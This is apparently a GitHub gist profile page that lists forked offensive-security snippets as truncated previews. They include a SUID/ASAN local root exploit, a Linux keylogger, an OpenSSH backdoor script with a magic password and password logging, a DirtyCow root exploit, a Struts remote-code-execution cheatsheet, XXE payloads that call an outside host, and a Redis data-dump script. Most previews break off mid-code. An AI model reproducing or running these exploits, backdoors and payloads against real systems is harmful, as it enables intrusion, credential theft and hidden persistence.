Tuan Anh Nguyen KbaHaxor

💭
hunting
View GitHub Profile
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
@KbaHaxor
KbaHaxor / gist:985725fe22ff9ca2a8f3b124ae34f9f5
Created September 22, 2016 08:33 — forked from bavardage/gist:939140
POC Linux Keylogger
#!/usr/bin/env python
import re, collections
from subprocess import *
def sanitize_keybinding(binding):
d = {'space': ' ',
'apostrophe': "'",
'BackSpace': ' (<-)',
'Return': '↵ \n',
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
#include <signal.h>
#include <string.h>
#include <unistd.h> // for usleep() only
#include <sys/time.h>
#include <sys/types.h>
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
@KbaHaxor
KbaHaxor / openssh-autobackdoor.bash
Created October 5, 2016 08:53 — forked from eyecatchup/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).
@KbaHaxor
KbaHaxor / get_ppid_and_name.c
Created October 6, 2016 07:16 — forked from fclairamb/get_ppid_and_name.c
posix: Get parent process id and name
#ifdef SHELL
gcc -Wall -Werror $0 && ./a.out
exit $?
#endif
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
@KbaHaxor
KbaHaxor / cowroot.c
Created October 21, 2016 15:04 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@KbaHaxor
KbaHaxor / struts-cheatsheet.md
Created November 10, 2016 07:27 — forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet

Apache Struts Remote Code Execution cheatsheet

Apache Struts is an open source framework for JavaEE web applications that encourages the MVC (Model View Controller) architecture. When the application is deployed in so-called devMode, as set in the struts.xml file:

<constant name="struts.devMode" value="true" />

then the framework will handle additional parameters passed to every action invocation.

Testing for Struts devMode enabled

@KbaHaxor
KbaHaxor / XXE_payloads
Created December 19, 2016 08:42 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@KbaHaxor
KbaHaxor / redis_dump.js
Created December 19, 2016 10:10 — forked from staaldraad/redis_dump.js
Dump data from open Redis instance
/*
Dump data from open Redis instance.
Usage: node redis_dump.js -h 10.10.0.1
node redis_dump.js -n 10 #dumps the first 10 keys from the instance
node redis_dump.js -k keyname #dump the value of a specific key
Author: etienne@sensepost.com
Version: 1.0 12 February 2015
*/
var redis = require("redis")